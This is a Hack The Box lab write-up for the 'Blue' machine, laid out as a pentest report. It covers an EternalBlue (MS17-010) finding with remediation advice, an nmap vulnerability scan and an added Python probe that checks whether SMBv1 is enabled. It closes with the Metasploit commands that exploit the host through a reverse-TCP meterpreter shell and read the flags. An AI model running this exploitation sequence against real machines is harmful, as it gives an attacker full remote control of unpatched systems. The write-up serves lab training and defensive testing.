
Blue


Description

Write-up: Guillaume
Creator: ch4p    Difficulty: Easy


Statement

IP Address    Description
10.10.10.40   Blue machine

Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.


Detailed solution

Assessment Overview and Recommendations

During the internal penetration test against the Blue machine, Guillaume Madec identified one (1) finding that threatens the confidentiality, integrity, and availability of the Blue machine. The finding was assigned a high-risk rating.

Guillaume Madec noted that patch and vulnerability management for the Blue machine is not well maintained. The conclusion of this report relates to the lack of fixes for known vulnerabilities in services and applications, leading to unauthorized access and full system compromise.

The finding concerns an outdated network file sharing protocol (SMBv1) whose unpatched implementation can be exploited over the network, without any credentials, to gain full control of the machine. This attack is very well documented and weaponized in public tooling, so it is likely to be particularly damaging even in the hands of an unskilled attacker. Since this vulnerable service was observed on the machine during the assessment, Hack The Box should start formulating a plan to patch the host and retire the dangerous service.

Network Penetration Test Assessment Summary

Guillaume Madec began all testing activities from the perspective of an unauthenticated user on the network. Hack The Box provided the tester with an IP address and the operating system type.

Summary of findings

During the course of testing, Guillaume Madec uncovered a total of one (1) finding that poses a material risk to the Blue machine. The table below provides a summary of the findings.

High Medium Low Total
1 0 0 1

Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the Technical Findings Details section of this report.

Finding # Severity Level Finding Name
1 High EternalBlue attack

Technical Findings Details

  1. EternalBlue Attack
CWE                             CWE-20 (Improper Input Validation)
CVSS 3.1 Score                  8.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Description (Incl. Root Cause)  The host exposes an SMBv1 server that is missing the MS17-010 security update. The nmap smb-vuln-ms17-010 script confirms it is vulnerable to the EternalBlue exploit (CVE-2017-0143).
Security Impact                 Successful exploitation gives unauthenticated remote code execution in the kernel, yielding a shell as NT AUTHORITY\SYSTEM.
Affected Host(s)                10.10.10.40 (blue.htb)
Remediation                     Apply the MS17-010 security update, then disable SMBv1 so that only SMBv2/SMBv3 are offered. Restrict inbound TCP/445 to the hosts that need it.
External References             https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
                                https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
                                https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

Finding Evidence:

The output of the following nmap scan (service detection on all ports, with the vuln script category) shows that the machine's SMB service is vulnerable to MS17-010:

$ nmap -sV 10.10.10.40 -p- -Pn --script=vuln
<SNIP...>
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
<SNIP...>
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
<SNIP...>
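
The nmap script above checks for the missing MS17-010 patch. The root cause listed in the finding, however, is that the host still speaks SMBv1 at all, which is what the exploit needs. The following probe, an added example that is not part of the original write-up or of any tool it uses, sends a single SMB_COM_NEGOTIATE request that offers only the SMBv1 "NT LM 0.12" dialect and decodes the reply: a server that answers with an SMB1 header still has SMBv1 enabled, while a server with SMBv1 disabled resets the connection or stays silent. It also reads the SecurityMode byte to report whether SMB signing is required. The target 10.10.10.40 and port 445 are taken from the page; the sample reply used for offline testing is constructed, not captured from the machine.

```python
"""
SMBv1 negotiate probe: does the target still speak the dialect EternalBlue needs?

Added example (not code from the original write-up). Wire layout follows the
SMB_COM_NEGOTIATE request/response in [MS-CIFS]. This is a protocol-exposure
check, not an MS17-010 patch check.
"""
import socket
import struct
import sys

SMB_HEADER_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS = 0x18                      # canonical pathnames, case-insensitive
SMB_FLAGS2 = 0x2801                   # NT status codes, extended security, long names
OFFERED_DIALECTS = [b"NT LM 0.12"]    # the SMBv1 dialect Windows uses; offer nothing newer
SECURITY_SIGNATURES_REQUIRED = 0x08   # SecurityMode bit in the NT LM 0.12 reply


def build_negotiate_request(dialects=OFFERED_DIALECTS, mid=1):
    """Return a NetBIOS-over-TCP frame carrying an SMB1 NEGOTIATE request."""
    # 32-byte SMB1 header: magic, command, NT status, flags, flags2, PIDHigh,
    # SecurityFeatures, reserved, TID, PIDLow, UID, MID.
    header = SMB_HEADER_MAGIC + struct.pack("<BIBH", SMB_COM_NEGOTIATE, 0, SMB_FLAGS, SMB_FLAGS2)
    header += struct.pack("<H8sHHHHH", 0, b"\x00" * 8, 0, 0, 0, 0, mid)
    # Parameters: WordCount = 0. Data: ByteCount, then 0x02 + NUL-terminated dialect strings.
    dialect_block = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    body = struct.pack("<BH", 0, len(dialect_block)) + dialect_block
    smb = header + body
    # NetBIOS session service header: message type 0x00 followed by a 24-bit big-endian length.
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate_response(frame, dialects=OFFERED_DIALECTS):
    """Decode an SMB1 NEGOTIATE reply; return None if the frame is not an SMB1 reply."""
    payload = frame[4:]                             # strip the NetBIOS session header
    if len(payload) < 35 or payload[:4] != SMB_HEADER_MAGIC:
        return None                                 # SMB2 (0xFE 'S' 'M' 'B'), garbage, or too short
    command, status = struct.unpack_from("<BI", payload, 4)
    if command != SMB_COM_NEGOTIATE:
        return None
    word_count = payload[32]
    result = {"smb1": True, "status": status, "dialect_index": None,
              "dialect": None, "security_mode": None, "signing_required": None}
    if word_count == 0:                             # error reply carries no parameter words
        return result
    dialect_index = struct.unpack_from("<H", payload, 33)[0]
    result["dialect_index"] = dialect_index
    if dialect_index < len(dialects):               # 0xFFFF means "none of the offered dialects"
        result["dialect"] = dialects[dialect_index].decode()
    if word_count >= 13:                            # LANMAN and NT LM 0.12 replies carry SecurityMode
        security_mode = payload[35]
        result["security_mode"] = security_mode
        result["signing_required"] = bool(security_mode & SECURITY_SIGNATURES_REQUIRED)
    return result


def probe_smbv1(host, port=445, timeout=5.0):
    """Send the negotiate to host:port; return the parsed reply, or None if SMBv1 was refused."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        try:
            frame = sock.recv(4096)
        except OSError:                             # reset or timeout: server will not speak SMBv1
            return None
    return parse_negotiate_response(frame) if frame else None


def build_sample_response(dialect_index=0, security_mode=0x03):
    """Constructed SMB1 NEGOTIATE reply (not captured from a real host) for offline testing."""
    header = SMB_HEADER_MAGIC + struct.pack("<BIBH", SMB_COM_NEGOTIATE, 0, 0x98, 0xC801)
    header += struct.pack("<H8sHHHHH", 0, b"\x00" * 8, 0, 0, 0, 0, 1)
    # WordCount 17 => 34 parameter bytes: DialectIndex, SecurityMode, MaxMpxCount, MaxNumberVcs,
    # MaxBufferSize, MaxRawSize, SessionKey, Capabilities, SystemTime, ServerTimeZone, ChallengeLength
    params = struct.pack("<HBHHIIIIqhB", dialect_index, security_mode, 50, 1,
                         4356, 65536, 0, 0x8000E3FD, 0, 0, 0)
    body = struct.pack("<B", 17) + params + struct.pack("<H", 16) + b"\x00" * 16  # 16-byte server GUID
    smb = header + body
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"
    reply = probe_smbv1(target)
    if reply is None:
        print(f"{target}: SMBv1 not offered")
    else:
        print(f"{target}: SMBv1 ENABLED, dialect={reply['dialect']}, "
              f"signing_required={reply['signing_required']}")
```

Run it as `python3 smb1_probe.py 10.10.10.40` (the file name is arbitrary). A reply of `SMBv1 ENABLED` with `signing_required=False` is exactly the exposure the finding describes; after the remediation (MS17-010 applied and SMBv1 disabled) the same probe should report `SMBv1 not offered`, which makes it a cheap re-test for the retest phase.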

This is a well-known vulnerability, so we check whether Metasploit already has an exploit for it:

$ msfconsole
<SNIP...>
msf6 > search ms17-010
<SNIP...>
0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
<SNIP...>

Having found an exploit module, we configure it (target host and listener address) and run it:

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
<SNIP...>
RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
<SNIP...>
LHOST     192.168.7.128    yes       The listen address (an interface may be specified)
<SNIP...>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.16.5
LHOST => 10.10.16.5


msf6 exploit(windows/smb/ms17_010_eternalblue) > run
<SNIP...>
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<SNIP...>
meterpreter >


The Meterpreter session runs as NT AUTHORITY\SYSTEM, so no privilege escalation is needed; we can read both flags directly:

meterpreter > cd /
meterpreter > cat Users\\haris\\Desktop\\user.txt 
67a<REDACTED>a57
meterpreter > cat Users\\Administrator\\Desktop\\root.txt 
130<REDACTED>b46
